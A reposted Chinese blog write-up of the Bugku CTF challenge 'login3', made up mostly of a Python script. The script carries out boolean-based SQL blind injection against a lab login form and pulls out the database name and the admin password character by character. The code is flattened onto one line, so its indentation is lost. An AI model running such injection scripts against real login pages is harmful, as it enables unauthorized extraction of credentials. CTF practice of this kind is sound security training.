Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)
Day41
login3(SKCTF)
import requests str_all="1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/=" url="http://123.206.31.85:49167/index.php" r=requests.session() def database():result=""for i in range(30):flag = 0for j in str_all:payload="admin'^(ascii(mid(database()from({})))<>{})^0#".format(str(i),ord(j))data = {"username": payload,"password": "123"}s=r.post(url,data)print(payload)if "error" in s.text:result+=jprint(result)if flag == 0:break def password():result=""for i in range(40):flag=0for j in str_all:payload = "admin'^(ascii(mid((select(password)from(admin))from({})))<>{})^0#".format(str(i+1),ord(j))data = {"username": payload,"password": "123"}s=r.post(url,data)print(payload)if "error" in s.text:result+=jflag=1print('**************************',result)if flag==0:break #database() password()
转载于:https://www.cnblogs.com/0yst3r-2046/p/11176746.html
Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)相关推荐
- mysql 时间盲注语句,sql注入学习记录(5)-基于时间延迟的SQL盲注
上次说到了sql注入中的基于报错盲注的基本的方法. 今天说一说报错盲注 基于时间延时的SQL盲注 使用时间延时注入的场景: 1.不能使用union select 联合查询方式注入 2.有些网站没有回显 ...
- 【less-5】基于SQLI的SQL盲注常用函数
实验声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险! 实验目的 实验环境 实验原理 实验步骤 第一步 登录SQLI-Labs平台 第二步 登录Kali平台,启动Firef ...
- python脚本自动化盲注_三、基于报错型注入和sql盲注的自动化实现
通过前面payload的构造,不难发现,对于报错型注入和布尔注入(sql盲注)纯手工注入的效率是非常慢的.这些payload语句虽然复杂,但大部分内容都是相同的,因此,一言不合就写了个脚本自动化注入, ...
- ctf各种sql盲注脚本
以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼 核心算法都是二分法,不推荐时间盲注(速度硬伤) 脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极 ...
- SQL 盲注GET /POST、布尔型,延时型Python脚本
以下脚本都用 sql-labs 中的题目进行测试: sql-labs 靶场:http://43.247.91.228:84/ 一,sql注入之 GET传参 之 布尔型: import requests ...
- sqli-lab--writeup(7~10)文件输出,时间布尔盲注
前置知识点: 1.outfile是将检索到的数据,保存到服务器的文件内: 格式:select * into outfile "文件地址" 示例: mysql> select ...
- SQL注入:sqli-labs lesson-8 lesson -9 基于布尔值和基于时间的盲注!
在上一次讲解了lesson -1的sql基本注入,我们在注入的时候,它会返回错误信息 但是盲注不会:什么是盲注:我理解的盲注是,web页面并不会返回错误信息,需要自己添加一些命令来让浏览器进行一些显而 ...
- sql_1-2_get基于盲注
sql_1-2_get基于盲注(时间,和布尔) 一 . 盲注的概念和类型 1.概念 sql(盲注)是注入攻击的一种,向数据库发生true或false这样的问题,并且根据应用程序返回的信息判断结果,这种 ...
- 以dvwa为例学习简单sql布尔盲注的详细脚本
0x01 前置知识 1.SQL注入与SQL盲注 SQL注入: 执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 一般在页面上直接就会显示执行sql语句的结果 S ...
- 渗透测试——sql注入进阶/基于时间的盲注/一看就会/
目录 一.注入点判断 注入类型 SQL注入的类型 二.基于时间的时间盲注 什么是时间盲注 sleep()函数 常用函数 三.bWAPP基于时间的盲注实战 一.注入点判断 1.输入一个单引号',因为语句 ...
最新文章
- 用英语说中国 IOS APP 上线
- PHp批量推送数据太慢,PHP非阻塞批量推送数据-php教程
- Eclipse插件开发总结(第二天)
- pythondjango搭建数据管理平台,使用Django快速搭建简单的数据管理后台
- 武大计算机几天出录取结果,录取大概要几天 多久录取结果出来
- 2022年中国企业直播多场景应用策略白皮书
- ORA-24324 ORA-24323 ORA-01090
- 卢伟冰宣布Redmi新机即将发布 疑为Redmi 8A
- WPF的ControlTemplate和DataTemplate简介
- 如何判断两个矩形相交
- Numpy中出现“ValueError: zero-size array to reduction operation maximum which has no identity”错误的调试笔记
- [转载] flutter开发桌面程序_在开始使用Flutter开发应用程序之前要了解的5条提示
- springboot日志输出异常_基于aop进行springboot接口调用日志和埋点日志输出,支持json格式方便elk收集...
- 求html写一个羽毛球拍的代码,一种组合式羽毛球拍的制作方法
- 《Real-Time Rendering》第四版学习笔记——Chapter 9 Physically Based Shading(一)
- Tableau:与Python集成
- 计算机专业854,精选-2017年哈工大计算机科学与技术专业854考研真题
- 报错:Solving environment: failed with initial frozen solve. Retrying with flexible solve.
- 解决0xc000012f 损坏的映像rasman.dll没有被指定在windows运行问题
- 室内定位indoor location
热门文章
- 爱心特效代码(HTML超文本标记语言,直接改记事本后缀)
- php nginx 伪静态规则,常见PHP程序的Nginx 伪静态规则
- 赖特 因果分析_量子至上的赖特的东西
- linux udp 端口 抓包,Linux系统-tcpdump常用抓包命令
- 文件解密 [Java]
- Kotlin初学者笔记
- 【半年时光-追寻你的足迹】
- 计算机任务管理器恢复默认,我的电脑中的任务管理器怎么打不开了,总是提示的“任务管理器已被系统管理员停用”,请问如何才能使任务管理器恢复正常。...
- Python 后端统一社会信用代码校验
- 想拿腾讯、阿里、字节跳动offer,除了技术还需要哪些成长?